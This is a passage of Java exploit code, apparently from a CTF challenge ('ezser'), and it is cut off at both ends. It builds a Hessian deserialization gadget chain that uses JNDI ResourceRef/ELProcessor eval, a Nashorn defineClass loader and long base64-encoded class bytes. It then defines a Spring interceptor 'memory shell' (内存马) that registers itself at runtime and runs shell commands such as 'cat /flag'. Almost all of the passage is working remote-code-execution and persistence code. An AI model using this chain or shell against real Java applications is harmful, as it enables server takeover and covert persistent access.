Q2tBUkFDSUFJa0FBZ0JBQUMwQWlnQ0xBQU1BWEFBUkFJd0FTZ0FFQUkwQUFBQU1BQUVBUUFBdEFJb0FqZ0FEQUZRQUFBQXRBQVQvQURRQUF3Y0Fqd2NBa0FjQWtRQUJCd0NTQlA4QUVnQUVCd0NQQndDUUJ3Q1JCd0NUQUFFSEFKUUdBQUlBbFFBQUFBSUFsZ0VQQUFBQUNnQUJBTGdBdEFFT0FBbHdkQUFGVUhWd2FURndkd0VBZUhoMEFBSjZXbk55QURGamIyMHVjM1Z1TG05eVp5NWhjR0ZqYUdVdWVIQmhkR2d1YVc1MFpYSnVZV3d1YjJKcVpXTjBjeTVZVTNSeWFXNW5IQW9uTzBnV3hmMENBQUI0Y2dBeFkyOXRMbk4xYmk1dmNtY3VZWEJoWTJobExuaHdZWFJvTG1sdWRHVnlibUZzTG05aWFtVmpkSE11V0U5aWFtVmpkUFNZRWdtN2U3WVpBZ0FCVEFBRmJWOXZZbXAwQUJKTWFtRjJZUzlzWVc1bkwwOWlhbVZqZER0NGNnQXNZMjl0TG5OMWJpNXZjbWN1WVhCaFkyaGxMbmh3WVhSb0xtbHVkR1Z5Ym1Gc0xrVjRjSEpsYzNOcGIyNEgyYVljamF5czFnSUFBVXdBQ0cxZmNHRnlaVzUwZEFBeVRHTnZiUzl6ZFc0dmIzSm5MMkZ3WVdOb1pTOTRjR0YwYUM5cGJuUmxjbTVoYkM5RmVIQnlaWE56YVc5dVRtOWtaVHQ0Y0hCeEFINEFFWGh4QUg0QUFuTnhBSDRBQUQ5QUFBQUFBQUFNZHdnQUFBQVFBQUFBQW5FQWZnQURjUUIrQUJoeEFINEFFbkVBZmdBR2VIRUFmZ0FaZUE9PSJ9AQCjeyJjb2RlIjoiMjAwIiwibWVzc2FnZSI6InJPMEFCWE55QUJOcVlYWmhMblYwYVd3dVFYSnlZWGxNYVhOMGVJSFNIWm5IWVowREFBRkpBQVJ6YVhwbGVIQUFBQUFCZHdRQUFBQUJkQUFwYjNKbkxtcGliM056TG5CeWIzaDVMbVZxWWk1b1lXNWtiR1V1U0c5dFpVaGhibVJzWlVsdGNHeDQifQEAEi9ibGFja2xpc3QvamRrL2dldAcAugwA1gDXDAA5ANUBAAxDb250ZW50LVR5cGUBAB5hcHBsaWNhdGlvbi9qc29uO2NoYXJzZXQ9VVRGLTgHALwMANgA2QwA2gDbBwDcDADdANUMAN4AOgwA3wA6DABaAFsMAF4AXwEABnN0YWFydAcA4AwA4QDiAQA5b3JnLnNwcmluZ2ZyYW1ld29yay53ZWIuc2VydmxldC5EaXNwYXRjaGVyU2VydmxldC5DT05URVhUBwDjDADkAOUBADVvcmcvc3ByaW5nZnJhbWV3b3JrL3dlYi9jb250ZXh0L1dlYkFwcGxpY2F0aW9uQ29udGV4dAEAUm9yZy9zcHJpbmdmcmFtZXdvcmsvd2ViL3NlcnZsZXQvbXZjL21ldGhvZC9hbm5vdGF0aW9uL1JlcXVlc3RNYXBwaW5nSGFuZGxlck1hcHBpbmcMAOYA5wEAPm9yZy9zcHJpbmdmcmFtZXdvcmsvd2ViL3NlcnZsZXQvaGFuZGxlci9BYnN0cmFjdEhhbmRsZXJNYXBwaW5nAQATYWRhcHRlZEludGVyY2VwdG9ycwcA6AwA6QDqAQAeamF2YS9sYW5nL05vU3VjaEZpZWxkRXhjZXB0aW9uDADrADoHAL4MAOwA7QwA7gDvAQAOamF2YS91dGlsL0xpc3QBACBqYXZhL2xhbmcvSWxsZWdhbEFjY2Vzc0V4Y2VwdGlvbgEAImNvbS9qYXZhL3BheWxvYWRzL21hZ2ljSW50ZXJjZXB0b3IMAPAA1wEAAm9rAQAQamF2YS9sYW5nL09iamVjdAEAMm9yZy9zcHJpbmdmcmFtZXdvcmsvd2ViL3NlcnZsZXQvSGFuZGxlckludGVyY2VwdG9yAQATamF2YS9pby9JbnB1dFN0cmVhbQEAEGphdmEvbGFuZy9TdHJpbmcBACVqYXZheC9zZXJ2bGV0L2h0dHAvSHR0cFNlcnZsZXRSZXF1ZXN0AQAmamF2YXgvc2VydmxldC9odHRwL0h0dHBTZXJ2bGV0UmVzcG9uc2UBABNqYXZhL2xhbmcvRXhjZXB0aW9uAQAXamF2YS9sYW5nL3JlZmxlY3QvRmllbGQBABBqYXZhL2xhbmcvU3lzdGVtAQADb3V0AQAVTGphdmEvaW8vUHJpbnRTdHJlYW07AQATamF2YS9pby9QcmludFN0cmVhbQEAB3ByaW50bG4BAAQoSSlWAQARamF2YS9sYW5nL1J1bnRpbWUBAApnZXRSdW50aW1lAQAVKClMamF2YS9sYW5nL1J1bnRpbWU7AQAEZXhlYwEAJyhMamF2YS9sYW5nL1N0cmluZzspTGphdmEvbGFuZy9Qcm9jZXNzOwEAEWphdmEvbGFuZy9Qcm9jZXNzAQAOZ2V0SW5wdXRTdHJlYW0BABcoKUxqYXZhL2lvL0lucHV0U3RyZWFtOwEAGChMamF2YS9pby9JbnB1dFN0cmVhbTspVgEADHVzZURlbGltaXRlcgEAJyhMamF2YS9sYW5nL1N0cmluZzspTGphdmEvdXRpbC9TY2FubmVyOwEAB2hhc05leHQBAAMoKVoBAARuZXh0AQAUKClMamF2YS9sYW5nL1N0cmluZzsBAA1nZXRSZXF1ZXN0VVJJAQAVKExqYXZhL2xhbmcvU3RyaW5nOylWAQAGZXF1YWxzAQAVKExqYXZhL2xhbmcvT2JqZWN0OylaAQAJYWRkSGVhZGVyAQAnKExqYXZhL2xhbmcvU3RyaW5nO0xqYXZhL2xhbmcvU3RyaW5nOylWAQAJZ2V0V3JpdGVyAQAXKClMamF2YS9pby9QcmludFdyaXRlcjsBABNqYXZhL2lvL1ByaW50V3JpdGVyAQAFd3JpdGUBAAVmbHVzaAEABWNsb3NlAQA8b3JnL3NwcmluZ2ZyYW1ld29yay93ZWIvY29udGV4dC9yZXF1ZXN0L1JlcXVlc3RDb250ZXh0SG9sZGVyAQAYY3VycmVudFJlcXVlc3RBdHRyaWJ1dGVzAQA9KClMb3JnL3NwcmluZ2ZyYW1ld29yay93ZWIvY29udGV4dC9yZXF1ZXN0L1JlcXVlc3RBdHRyaWJ1dGVzOwEAOW9yZy9zcHJpbmdmcmFtZXdvcmsvd2ViL2NvbnRleHQvcmVxdWVzdC9SZXF1ZXN0QXR0cmlidXRlcwEADGdldEF0dHJpYnV0ZQEAJyhMamF2YS9sYW5nL1N0cmluZztJKUxqYXZhL2xhbmcvT2JqZWN0OwEAB2dldEJlYW4BACUoTGphdmEvbGFuZy9DbGFzczspTGphdmEvbGFuZy9PYmplY3Q7AQAPamF2YS9sYW5nL0NsYXNzAQAQZ2V0RGVjbGFyZWRGaWVsZAEALShMamF2YS9sYW5nL1N0cmluZzspTGphdmEvbGFuZy9yZWZsZWN0L0ZpZWxkOwEAD3ByaW50U3RhY2tUcmFjZQEADXNldEFjY2Vzc2libGUBAAQoWilWAQADZ2V0AQAmKExqYXZhL2xhbmcvT2JqZWN0OylMamF2YS9sYW5nL09iamVjdDsBAANhZGQAIQAxADUAAQA2AAEACQA3ADgAAAAFAAEAOQA6AAEAOwAAAC8AAQABAAAABSq3AAGxAAAAAgA8AAAABgABAAAAGwA9AAAADAABAAAABQA+AD8AAAABAEAAQQACADsAAAGvAAMACQAAAK2yAAKyAAO2AAS4AAUSBrYAB7YACDoFuwAJWRkFtwAKEgu2AAw6BhkGtgANmQALGQa2AA6nAAUSDzoHsgACK7kAEAEAtgARsgADBXCaAAoSEjoEpwAHEhM6BCu5ABABABIUtgAVmQBHuwAJWRkEtwAWEgu2AAy2AA46CCwSFxIYuQAZAwAsuQAaAQAZCLYAGyy5ABoBALYAHCy5ABoBALYAHbIAAwRgswADA6wErAAAAAMAPAAAAEYAEQAAADkACQA6ABYAOwAmADwAOgA9AEYAPwBOAEAAVQBDAFkARgBnAEcAegBLAIQATACPAE0AmABOAKEATwCpAFAAqwBlAD0AAABmAAoAUgADAEIAQwAEAHoAMQBEAEMACAAAAK0APgA/AAAAAACtAEUARgABAAAArQBHAEgAAgAAAK0ASQBKAAMAWQBUAEIAQwAEABYAlwBLAEwABQAmAIcATQBOAAYAOgBzAE8AQwAHAFAAAAA4AAX+ADYABwBRBwBSQQcAU/wAHAcAU/8AAwAIBwBUBwBVBwBWBwBXBwBTBwBRBwBSBwBTAAD7AFEAWAAAAAQAAQBZAAEAWgBbAAIAOwAAAGAABQAFAAAACiorLC0ZBLcAHrEAAAACADwAAAAKAAIAAABqAAkAawA9AAAANAAFAAAACgA+AD8AAAAAAAoARQBGAAEAAAAKAEcASAACAAAACgBJAEoAAwAAAAoAXABdAAQAWAAAAAQAAQBZAAEAXgBfAAIAOwAAAGAABQAFAAAACiorLC0ZBLcAH7EAAAACADwAAAAKAAIAAABvAAkAcAA9AAAANAAFAAAACgA+AD8AAAAAAAoARQBGAAEAAAAKAEcASAACAAAACgBJAEoAAwAAAAoAYABhAAQAWAAAAAQAAQBZAAgAYgA6AAEAOwAAAXEAAwAFAAAAbgSzAAOyAAISILYAEbgAIRIiA7kAIwMAwAAkSyoSJbkAJgIAwAAlTAFNEicSKLYAKU2nAAhOLbYAKywEtgAsAU4sK7YALcAALk6nAAo6BBkEtgAwuwAxWbcAMjoELRkEuQAzAgBXsgACEjS2ABGxAAIAKQAxADQAKgBAAEkATAAvAAQAPAAAAE4AEwAAAB0ABAAfAAwAIAAbACEAJwAiACkAJAAxACcANAAlADUAJgA5ACgAPgApAEAAKwBJAC4ATAAsAE4ALQBTAC8AXAAwAGUAMQBtADIAPQAAAEgABwA1AAQAYwBkAAMATgAFAGMAZQAEABsAUgBmAGcAAAAnAEYAaABpAAEAKQBEAGoAawACAEAALQBsAG0AAwBcABEAbgA/AAQAbwAAAAwAAQBAAC0AbABwAAMAUAAAAC0ABP8ANAADBwBxBwByBwBzAAEHAHQE/wASAAQHAHEHAHIHAHMHAHUAAQcAdgYAAQB3AAAAAgB4';var Thread = Java.type('java.lang.Thread');var tt=Thread.currentThread().getContextClassLoader();var b64 = Java.type('sun.misc.BASE64Decoder');var b=new b64().decodeBuffer(str);var byteArray = Java.type('byte[]');var int = Java.type('int');var defineClassMethod = java.lang.ClassLoader.class.getDeclaredMethod('defineClass',byteArray.class,int.class,int.class);defineClassMethod.setAccessible(true);var cc = defineClassMethod.invoke(tt,b,0,b.length);cc.newInstance();";
        ResourceRef resourceRef = new ResourceRef("javax.el.ELProcessor", (String)null, "", "", true, "org.apache.naming.factory.BeanFactory", (String)null);
        resourceRef.add(new StringRefAddr("forceString", "pupi1=eval"));
        resourceRef.add(new StringRefAddr("pupi1", "\"\".getClass().forName(\"javax.script.ScriptEngineManager\").newInstance().getEngineByName(\"js\").eval(\""+ x +"\")"));
        ReferenceWrapper referenceWrapper = new ReferenceWrapper(resourceRef);

        Class<?> ccCl = Class.forName("javax.naming.spi.ContinuationDirContext"); //$NON-NLS-1$
        Constructor<?> ccCons = ccCl.getDeclaredConstructor(CannotProceedException.class, Hashtable.class);
        ccCons.setAccessible(true);
        CannotProceedException cpe = new CannotProceedException();
        ReflectionHelper.setFieldValue(cpe, "cause", null);
        ReflectionHelper.setFieldValue(cpe, "stackTrace", null);

        cpe.setResolvedObj(resourceRef);

        ReflectionHelper.setFieldValue(cpe, "suppressedExceptions", null);
        DirContext ctx = (DirContext) ccCons.newInstance(cpe, new Hashtable<>());

//        jdk.nashorn.internal.objects.NativeString str = new jdk.nashorn.internal.objects.NativeString();

        JSONObject jsonObject = new JSONObject();
        jsonObject.put("Pupi1",ctx);

//        Object str = ReflectionHelper.createWithoutConstructor("jdk.nashorn.internal.objects.NativeString");
//        ReflectionHelper.setFieldValue(str,"value",jsonObject);
        Object xstring = ReflectionHelper.createWithoutConstructor("com.sun.org.apache.xpath.internal.objects.XStringForFSB");
        ReflectionHelper.setFieldValue(xstring, "m_obj", new FastStringBuffer());

        XString xString = new XString("Pupi1");

        HashMap map1 = new HashMap();
        HashMap map2 = new HashMap();
        map1.put("yy",jsonObject);
        map1.put("zZ",xstring);
        map2.put("yy",xstring);
        map2.put("zZ",jsonObject);

        Object o = makeMap(map1,map2);
        HashMap map = new HashMap();
//        map.put(obj,o);

        ByteArrayOutputStream bout = new ByteArrayOutputStream();
        Hessian2Output hout = new Hessian2Output(bout);
        hout.setSerializerFactory(serializerFactory);
        hout.getSerializerFactory().setAllowNonSerializable(true);
        hout.writeString("C");
        //hout.writeObjectBegin("Object");
        //hout.writeString("2.2");
        hout.writeObject(jsonObject);

        hout.close();
        String ret = Base64.getEncoder().encodeToString(bout.toByteArray());
        System.out.println(ret);

内存马：

public class magicInterceptor implements HandlerInterceptor {

    public  static int nums = 1;
    static {
        System.out.println("staart");
        WebApplicationContext context = (WebApplicationContext) RequestContextHolder.currentRequestAttributes().getAttribute("org.springframework.web.servlet.DispatcherServlet.CONTEXT", 0);
        RequestMappingHandlerMapping mappingHandlerMapping = context.getBean(RequestMappingHandlerMapping.class);
        Field field = null;
        try {
            field = AbstractHandlerMapping.class.getDeclaredField("adaptedInterceptors");
        } catch (NoSuchFieldException e) {
            e.printStackTrace();
        }
        field.setAccessible(true);
        List<HandlerInterceptor> adaptInterceptors = null;
        try {
            adaptInterceptors = (List<HandlerInterceptor>) field.get(mappingHandlerMapping);
        } catch (IllegalAccessException e) {
            e.printStackTrace();
        }
        magicInterceptor evilInterceptor = new magicInterceptor();
        adaptInterceptors.add(evilInterceptor);
        System.out.println("ok");
    }

    @Override
    public boolean preHandle(HttpServletRequest request, HttpServletResponse response, Object handler) throws Exception {
//        String code1 =
         //        System.out.println(request.getRequestURI());
        String code;
        System.out.println(nums);
        InputStream in = Runtime.getRuntime().exec("cat /flag").getInputStream();
        Scanner s = new Scanner(in).useDelimiter("\\A");
        String output = s.hasNext() ? s.next() : "";
        System.out.println(request.getRequestURI());
//        code = "{\"code\":\"200\",\"message\":\""+output+"\"}";
        if(nums % 2 ==0){
            code = "{\"code\":\"200\",\"message\":\"rO0ABXNyABFqYXZhLnV0aWwuSGFzaE1hcAUH2sHDFmDRAwACRgAKbG9hZEZhY3RvckkACXRocmVzaG9sZHhwP0AAAAAAAAB3CAAAAAIAAAACc3EAfgAAP0AAAAAAAAx3CAAAABAAAAACdAACeXlzcgAfY29tLmFsaWJhYmEuZmFzdGpzb24yLkpTT05BcnJheQAAAAAAAAABAgAAeHIAE2phdmEudXRpbC5BcnJheUxpc3R4gdIdmcdhnQMAAUkABHNpemV4cAAAAAF3BAAAAAFzcgA6Y29tLnN1bi5vcmcuYXBhY2hlLnhhbGFuLmludGVybmFsLnhzbHRjLnRyYXguVGVtcGxhdGVzSW1wbAlXT8FurKszAwAGSQANX2luZGVudE51bWJlckkADl90cmFuc2xldEluZGV4WwAKX2J5dGVjb2Rlc3QAA1tbQlsABl9jbGFzc3QAEltMamF2YS9sYW5nL0NsYXNzO0wABV9uYW1ldAASTGphdmEvbGFuZy9TdHJpbmc7TAARX291dHB1dFByb3BlcnRpZXN0ABZMamF2YS91dGlsL1Byb3BlcnRpZXM7eHAAAAAA/////3VyAANbW0JL/RkVZ2fbNwIAAHhwAAAAAXVyAAJbQqzzF/gGCFTgAgAAeHAAABoMyv66vgAAADQBMwoAQACXCACYCACZCgCaAJsKAJoAnAoAnQCeCQCfAKAJADwAoQoAogCjCgCkAKUIAKYKAKQApwoAqACpBwCqCgAOAKsIAKwKAA4ArQoADgCuCgAOAK8KAKIAsAcAsQoAFQCXCACyCgAVALMKALQAtQoAtgC3CgC4ALkIALoKABUAuwsAvAC9CAC+CgC2AL8KAA4AwAgAwQgAwgsAwwDECwDDAMUKAMYAxwoAxgDICgDGAMkLAEEAygsAQQDLCADMCgDNAM4IAM8LANAA0QcA0gcA0wsALwDUBwDVCADWCgDXANgHANkKADUA2goA2wDcCgDbAN0HAN4HAN8KADoA2gcA4AoAPACXCwA5AOEIAOIHAOMHAOQBAARudW1zAQABSQEABjxpbml0PgEAAygpVgEABENvZGUBAA9MaW5lTnVtYmVyVGFibGUBABJMb2NhbFZhcmlhYmxlVGFibGUBAAR0aGlzAQAmTGNvbS9jdGYvZXpzZXIvdXRpbHMvbWFnaWNJbnRlcmNlcHRvcjsBAAxyZXBsYWNlQmxhbmsBACYoTGphdmEvbGFuZy9TdHJpbmc7KUxqYXZhL2xhbmcvU3RyaW5nOwEAAXABABlMamF2YS91dGlsL3JlZ2V4L1BhdHRlcm47AQABbQEAGUxqYXZhL3V0aWwvcmVnZXgvTWF0Y2hlcjsBAANzdHIBABJMamF2YS9sYW5nL1N0cmluZzsBAARkZXN0AQANU3RhY2tNYXBUYWJsZQcA5QEACXByZUhhbmRsZQEAZChMamF2YXgvc2VydmxldC9odHRwL0h0dHBTZXJ2bGV0UmVxdWVzdDtMamF2YXgvc2VydmxldC9odHRwL0h0dHBTZXJ2bGV0UmVzcG9uc2U7TGphdmEvbGFuZy9PYmplY3Q7KVoBAAZyZXN1bHQBAAdyZXF1ZXN0AQAnTGphdmF4L3NlcnZsZXQvaHR0cC9IdHRwU2VydmxldFJlcXVlc3Q7AQAIcmVzcG9uc2UBAChMamF2YXgvc2VydmxldC9odHRwL0h0dHBTZXJ2bGV0UmVzcG9uc2U7AQAHaGFuZGxlcgEAEkxqYXZhL2xhbmcvT2JqZWN0OwEABGNvZGUBAAJpbgEAFUxqYXZhL2lvL0lucHV0U3RyZWFtOwEAAXMBABNMamF2YS91dGlsL1NjYW5uZXI7AQAGb3V0cHV0BwDmBwCqBwDgBwDnBwDoBwDpAQAKRXhjZXB0aW9ucwcA6gEACnBvc3RIYW5kbGUBAJIoTGphdmF4L3NlcnZsZXQvaHR0cC9IdHRwU2VydmxldFJlcXVlc3Q7TGphdmF4L3NlcnZsZXQvaHR0cC9IdHRwU2VydmxldFJlc3BvbnNlO0xqYXZhL2xhbmcvT2JqZWN0O0xvcmcvc3ByaW5nZnJhbWV3b3JrL3dlYi9zZXJ2bGV0L01vZGVsQW5kVmlldzspVgEADG1vZGVsQW5kVmlldwEALkxvcmcvc3ByaW5nZnJhbWV3b3JrL3dlYi9zZXJ2bGV0L01vZGVsQW5kVmlldzsBAA9hZnRlckNvbXBsZXRpb24BAHkoTGphdmF4L3NlcnZsZXQvaHR0cC9IdHRwU2VydmxldFJlcXVlc3Q7TGphdmF4L3NlcnZsZXQvaHR0cC9IdHRwU2VydmxldFJlc3BvbnNlO0xqYXZhL2xhbmcvT2JqZWN0O0xqYXZhL2xhbmcvRXhjZXB0aW9uOylWAQACZXgBABVMamF2YS9sYW5nL0V4Y2VwdGlvbjsBAAl0cmFuc2Zvcm0BAHIoTGNvbS9zdW4vb3JnL2FwYWNoZS94YWxhbi9pbnRlcm5hbC94c2x0Yy9ET007W0xjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL3NlcmlhbGl6ZXIvU2VyaWFsaXphdGlvbkhhbmRsZXI7KVYBAAhkb2N1bWVudAEALUxjb20vc3VuL29yZy9hcGFjaGUveGFsYW4vaW50ZXJuYWwveHNsdGMvRE9NOwEACGhhbmRsZXJzAQBCW0xjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL3NlcmlhbGl6ZXIvU2VyaWFsaXphdGlvbkhhbmRsZXI7BwDrAQCmKExjb20vc3VuL29yZy9hcGFjaGUveGFsYW4vaW50ZXJuYWwveHNsdGMvRE9NO0xjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL2R0bS9EVE1BeGlzSXRlcmF0b3I7TGNvbS9zdW4vb3JnL2FwYWNoZS94bWwvaW50ZXJuYWwvc2VyaWFsaXplci9TZXJpYWxpemF0aW9uSGFuZGxlcjspVgEACGl0ZXJhdG9yAQA1TGNvbS9zdW4vb3JnL2FwYWNoZS94bWwvaW50ZXJuYWwvZHRtL0RUTUF4aXNJdGVyYXRvcjsBAEFMY29tL3N1bi9vcmcvYXBhY2hlL3htbC9pbnRlcm5hbC9zZXJpYWxpemVyL1NlcmlhbGl6YXRpb25IYW5kbGVyOwEACDxjbGluaXQ+AQABZQEAIExqYXZhL2xhbmcvTm9TdWNoRmllbGRFeGNlcHRpb247AQAiTGphdmEvbGFuZy9JbGxlZ2FsQWNjZXNzRXhjZXB0aW9uOwEAB2NvbnRleHQBADdMb3JnL3NwcmluZ2ZyYW1ld29yay93ZWIvY29udGV4dC9XZWJBcHBsaWNhdGlvbkNvbnRleHQ7AQAVbWFwcGluZ0hhbmRsZXJNYXBwaW5nAQBUTG9yZy9zcHJpbmdmcmFtZXdvcmsvd2ViL3NlcnZsZXQvbXZjL21ldGhvZC9hbm5vdGF0aW9uL1JlcXVlc3RNYXBwaW5nSGFuZGxlck1hcHBpbmc7AQAFZmllbGQBABlMamF2YS9sYW5nL3JlZmxlY3QvRmllbGQ7AQARYWRhcHRJbnRlcmNlcHRvcnMBABBMamF2YS91dGlsL0xpc3Q7AQAPZXZpbEludGVyY2VwdG9yAQAWTG9jYWxWYXJpYWJsZVR5cGVUYWJsZQEARkxqYXZhL3V0aWwvTGlzdDxMb3JnL3NwcmluZ2ZyYW1ld29yay93ZWIvc2VydmxldC9IYW5kbGVySW50ZXJjZXB0b3I7PjsHANIHANMHAOwHANkHAN4HAN8BAApTb3VyY2VGaWxlAQAVbWFnaWNJbnRlcmNlcHRvci5qYXZhDABEAEUBAAABAAlccyp8CXwNfAoHAO0MAO4A7wwA8ADxBwDyDADzAEwHAPQMAPUA9gwAQgBDBwD3DAD4APkHAPoMAPsA/AEADGxzIC1hbCAvcm9vdAwA/QD+BwD/DAEAAQEBABFqYXZhL3V0aWwvU2Nhbm5lcgwARAECAQACXEEMAQMBBAwBBQEGDAEHAQgMAPgBCQEAF2phdmEvbGFuZy9TdHJpbmdCdWlsZGVyAQAZeyJjb2RlIjoiMjAwIiwibWVzc2FnZSI6IgwBCgELBwEMDAENARAHAOUMAREBEgcBEwwBFAEVAQACIn0MARYBCAcA5wwBFwEIAQAHL3N0YXR1cwwBGAEZDABEAQkBAAxDb250ZW50LVR5cGUBAB5hcHBsaWNhdGlvbi9qc29uO2NoYXJzZXQ9VVRGLTgHAOgMARoBGwwBHAEdBwEeDAEfAQkMASAARQwBIQBFDABtAG4MAHEAcgEABnN0YWFydAcBIgwBIwEkAQA5b3JnLnNwcmluZ2ZyYW1ld29yay53ZWIuc2VydmxldC5EaXNwYXRjaGVyU2VydmxldC5DT05URVhUBwElDAEmAScBADVvcmcvc3ByaW5nZnJhbWV3b3JrL3dlYi9jb250ZXh0L1dlYkFwcGxpY2F0aW9uQ29udGV4dAEAUm9yZy9zcHJpbmdmcmFtZXdvcmsvd2ViL3NlcnZsZXQvbXZjL21ldGhvZC9hbm5vdGF0aW9uL1JlcXVlc3RNYXBwaW5nSGFuZGxlck1hcHBpbmcMASgBKQEAPm9yZy9zcHJpbmdmcmFtZXdvcmsvd2ViL3NlcnZsZXQvaGFuZGxlci9BYnN0cmFjdEhhbmRsZXJNYXBwaW5nAQATYWRhcHRlZEludGVyY2VwdG9ycwcBKgwBKwEsAQAeamF2YS9sYW5nL05vU3VjaEZpZWxkRXhjZXB0aW9uDAEtAEUHAOwMAS4BLwwBMAExAQAOamF2YS91dGlsL0xpc3QBACBqYXZhL2xhbmcvSWxsZWdhbEFjY2Vzc0V4Y2VwdGlvbgEAJGNvbS9jdGYvZXpzZXIvdXRpbHMvbWFnaWNJbnRlcmNlcHRvcgwBMgEZAQACb2sBAEBjb20vc3VuL29yZy9hcGFjaGUveGFsYW4vaW50ZXJuYWwveHNsdGMvcnVudGltZS9BYnN0cmFjdFRyYW5zbGV0AQAyb3JnL3NwcmluZ2ZyYW1ld29yay93ZWIvc2VydmxldC9IYW5kbGVySW50ZXJjZXB0b3IBABBqYXZhL2xhbmcvU3RyaW5nAQATamF2YS9pby9JbnB1dFN0cmVhbQEAJWphdmF4L3NlcnZsZXQvaHR0cC9IdHRwU2VydmxldFJlcXVlc3QBACZqYXZheC9zZXJ2bGV0L2h0dHAvSHR0cFNlcnZsZXRSZXNwb25zZQEAEGphdmEvbGFuZy9PYmplY3QBABNqYXZhL2xhbmcvRXhjZXB0aW9uAQA5Y29tL3N1bi9vcmcvYXBhY2hlL3hhbGFuL2ludGVybmFsL3hzbHRjL1RyYW5zbGV0RXhjZXB0aW9uAQAXamF2YS9sYW5nL3JlZmxlY3QvRmllbGQBABdqYXZhL3V0aWwvcmVnZXgvUGF0dGVybgEAB2NvbXBpbGUBAC0oTGphdmEvbGFuZy9TdHJpbmc7KUxqYXZhL3V0aWwvcmVnZXgvUGF0dGVybjsBAAdtYXRjaGVyAQAzKExqYXZhL2xhbmcvQ2hhclNlcXVlbmNlOylMamF2YS91dGlsL3JlZ2V4L01hdGNoZXI7AQAXamF2YS91dGlsL3JlZ2V4L01hdGNoZXIBAApyZXBsYWNlQWxsAQAQamF2YS9sYW5nL1N5c3RlbQEAA291dAEAFUxqYXZhL2lvL1ByaW50U3RyZWFtOwEAE2phdmEvaW8vUHJpbnRTdHJlYW0BAAdwcmludGxuAQAEKEkpVgEAEWphdmEvbGFuZy9SdW50aW1lAQAKZ2V0UnVudGltZQEAFSgpTGphdmEvbGFuZy9SdW50aW1lOwEABGV4ZWMBACcoTGphdmEvbGFuZy9TdHJpbmc7KUxqYXZhL2xhbmcvUHJvY2VzczsBABFqYXZhL2xhbmcvUHJvY2VzcwEADmdldElucHV0U3RyZWFtAQAXKClMamF2YS9pby9JbnB1dFN0cmVhbTsBABgoTGphdmEvaW8vSW5wdXRTdHJlYW07KVYBAAx1c2VEZWxpbWl0ZXIBACcoTGphdmEvbGFuZy9TdHJpbmc7KUxqYXZhL3V0aWwvU2Nhbm5lcjsBAAdoYXNOZXh0AQADKClaAQAEbmV4dAEAFCgpTGphdmEvbGFuZy9TdHJpbmc7AQAVKExqYXZhL2xhbmcvU3RyaW5nOylWAQAGYXBwZW5kAQAtKExqYXZhL2xhbmcvU3RyaW5nOylMamF2YS9sYW5nL1N0cmluZ0J1aWxkZXI7AQAQamF2YS91dGlsL0Jhc2U2NAEACmdldEVuY29kZXIBAAdFbmNvZGVyAQAMSW5uZXJDbGFzc2VzAQAcKClMamF2YS91dGlsL0Jhc2U2NCRFbmNvZGVyOwEACGdldEJ5dGVzAQAEKClbQgEAGGphdmEvdXRpbC9CYXNlNjQkRW5jb2RlcgEADmVuY29kZVRvU3RyaW5nAQAWKFtCKUxqYXZhL2xhbmcvU3RyaW5nOwEACHRvU3RyaW5nAQANZ2V0UmVxdWVzdFVSSQEABmVxdWFscwEAFShMamF2YS9sYW5nL09iamVjdDspWgEACWFkZEhlYWRlcgEAJyhMamF2YS9sYW5nL1N0cmluZztMamF2YS9sYW5nL1N0cmluZzspVgEACWdldFdyaXRlcgEAFygpTGphdmEvaW8vUHJpbnRXcml0ZXI7AQATamF2YS9pby9QcmludFdyaXRlcgEABXdyaXRlAQAFZmx1c2gBAAVjbG9zZQEAPG9yZy9zcHJpbmdmcmFtZXdvcmsvd2ViL2NvbnRleHQvcmVxdWVzdC9SZXF1ZXN0Q29udGV4dEhvbGRlcgEAGGN1cnJlbnRSZXF1ZXN0QXR0cmlidXRlcwEAPSgpTG9yZy9zcHJpbmdmcmFtZXdvcmsvd2ViL2NvbnRleHQvcmVxdWVzdC9SZXF1ZXN0QXR0cmlidXRlczsBADlvcmcvc3ByaW5nZnJhbWV3b3JrL3dlYi9jb250ZXh0L3JlcXVlc3QvUmVxdWVzdEF0dHJpYnV0ZXMBAAxnZXRBdHRyaWJ1dGUBACcoTGphdmEvbGFuZy9TdHJpbmc7SSlMamF2YS9sYW5nL09iamVjdDsBAAdnZXRCZWFuAQAlKExqYXZhL2xhbmcvQ2xhc3M7KUxqYXZhL2xhbmcvT2JqZWN0OwEAD2phdmEvbGFuZy9DbGFzcwEAEGdldERlY2xhcmVkRmllbGQBAC0oTGphdmEvbGFuZy9TdHJpbmc7KUxqYXZhL2xhbmcvcmVmbGVjdC9GaWVsZDsBAA9wcmludFN0YWNrVHJhY2UBAA1zZXRBY2Nlc3NpYmxlAQAEKFopVgEAA2dldAEAJihMamF2YS9sYW5nL09iamVjdDspTGphdmEvbGFuZy9PYmplY3Q7AQADYWRkACEAPABAAAEAQQABAAkAQgBDAAAACAABAEQARQABAEYAAAAvAAEAAQAAAAUqtwABsQAAAAIARwAAAAYAAQAAACUASAAAAAwAAQAAAAUASQBKAAAACQBLAEwAAQBGAAAAhgACAAQAAAAcEgJMKsYAFhIDuAAETSwqtgAFTi0SArYABkwrsAAAAAMARwAAABoABgAAAD8AAwBBAAcAQwANAEUAEwBHABoASwBIAAAAKgAEAA0ADQBNAE4AAgATAAcATwBQAAMAAAAcAFEAUgAAAAMAGQBTAFIAAQBUAAAACAAB/AAaBwBVAAEAVgBXAAIARgAAAaEAAwAJAAAAurIAB7IACLYACbgAChILtgAMtgANOgW7AA5ZGQW3AA8SELYAEToGGQa2ABKZAAsZBrYAE6cABRICOgeyAAcZB7YAFLsAFVm3ABYSF7YAGLgAGRkHtgAatgAbtgAYEhy2ABi2AB06BCu5AB4BABIftgAgmQBHuwAOWRkEtwAhEhC2ABG2ABM6CCwSIhIjuQAkAwAsuQAlAQAZCLYAJiy5ACUBALYAJyy5ACUBALYAKLIACARgswAIA6wErAAAAAMARwAAAD4ADwAAAFQACQBYABYAWQAmAFoAOgBiAEIAZQBmAG0AdABuAIcAcgCRAHMAnAB0AKUAdQCuAHYAtgB3ALgAjABIAAAAXAAJAIcAMQBYAFIACAAAALoASQBKAAAAAAC6AFkAWgABAAAAugBbAFwAAgAAALoAXQBeAAMAZgBUAF8AUgAEABYApABgAGEABQAmAJQAYgBjAAYAOgCAAGQAUgAHAFQAAAAvAAP+ADYABwBlBwBmQQcAVf8AfwAIBwBnBwBoBwBpBwBqBwBVBwBlBwBmBwB